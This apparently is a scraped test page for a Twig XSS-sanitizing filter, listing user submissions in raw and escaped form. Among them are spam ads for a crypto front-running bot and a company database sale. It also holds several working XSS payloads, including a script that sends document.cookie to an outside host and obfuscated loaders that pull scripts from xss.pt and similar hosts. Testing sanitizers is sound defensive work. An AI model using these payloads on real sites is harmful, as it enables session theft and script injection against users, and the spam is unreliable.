description: Hi there,\\r\\n\\r\\nHave you ever wondered why new cryptocurrency tokens are always subject to insane price action?\\r\\n\\r\\nWe are giving away a totally free step-by-step guide on how you can profit from that with a front running bot.\\r\\n\\r\\nCheck out our new Youtube video to learn how to deploy your own bot without any coding experience:\\r\\nhttps://www.youtube.com/watch?v=NYCG0JEEhvQ\\r\\n\\r\\nKind Regards,\\r\\nJaclyn

by Jaclyn Mahmood | at 2022-03-31 14:53:25


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

It is with sad regret to inform you DataList.biz is shutting down on 31 March 2022. \\r\\n\\r\\nWe have made available databases per country for all companies available.. \\r\\n\\r\\nYou can view our samples and download databases instantly on our website DataList.biz

result with twig: {{ xss.xss | escape }}:

It is with sad regret to inform you DataList.biz is shutting down on 31 March 2022. \\r\\n\\r\\nWe have made available databases per country for all companies available.. \\r\\n\\r\\nYou can view our samples and download databases instantly on our website DataList.biz

keyword(s):

description: It is with sad regret to inform you DataList.biz is shutting down on 31 March 2022. \\r\\n\\r\\nWe have made available databases per country for all companies available.. \\r\\n\\r\\nYou can view our samples and download databases instantly on our website DataList.biz

by Willy Asche | at 2022-03-28 16:13:08


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

http://www.test.com/index.php?keyword=var img = document.createElement(‘img’);img.width = 0;img.height = 0;img.src = ‘http://www.aaa.com/?content=’+;

result with twig: {{ xss.xss | escape }}:

http://www.test.com/index.php?keyword=<script type=text/javascript>var img = document.createElement(‘img’);img.width = 0;img.height = 0;img.src = ‘http://www.aaa.com/?content=’%2Bdocument.cookie;</script>

keyword(s): 1

description: 1

by 1 | at 2022-03-27 11:32:54


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

testing aja ini <div <img

result with twig: {{ xss.xss | escape }}:

testing aja ini <div <img src=x onerror=eval(atob(\\\'cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzcy5wdC9ia0VRPycrTWF0aC5yYW5kb20oKQ==\\\'))

keyword(s):

description:

by devjord | at 2022-03-23 10:15:50


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

devjord TEST test

result with twig: {{ xss.xss | escape }}:

devjord TEST test &lt;sCRiPt/SrC=//xs.ax/hZqa&gt

keyword(s):

description:

by devjord | at 2022-03-23 05:01:14


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

devjord test test

result with twig: {{ xss.xss | escape }}:

devjord test test &lt;sCRiPt/SrC=//xs.ax/hZqa&gt

keyword(s):

description:

by devjord | at 2022-03-23 05:00:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<sCRiPt sRC=https://xssaq.com/Dv8Q></sCrIpT>

keyword(s):

description: test aja

by devjord | at 2022-03-23 04:50:11


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Tested By Arhur Salvatore \\r\\n</tEXtArEa>\\\'\\\">\\r\\n

result with twig: {{ xss.xss | escape }}:

<marquee style=\\\"font-size:1.5em; font-weight:bolder; text-transform:uppercase;border-bottom: 4px solid red; border-top: 4px solid red; margin: 10px\\\"> Tested By Arhur Salvatore </marquee>\\r\\n</tEXtArEa>\\\'\\\"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22https%3A%2F%2Fxss.pt%2FHbmb%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>\\r\\n

keyword(s): xsspt4

description: xss4

by arthursalvtr | at 2022-03-23 03:27:17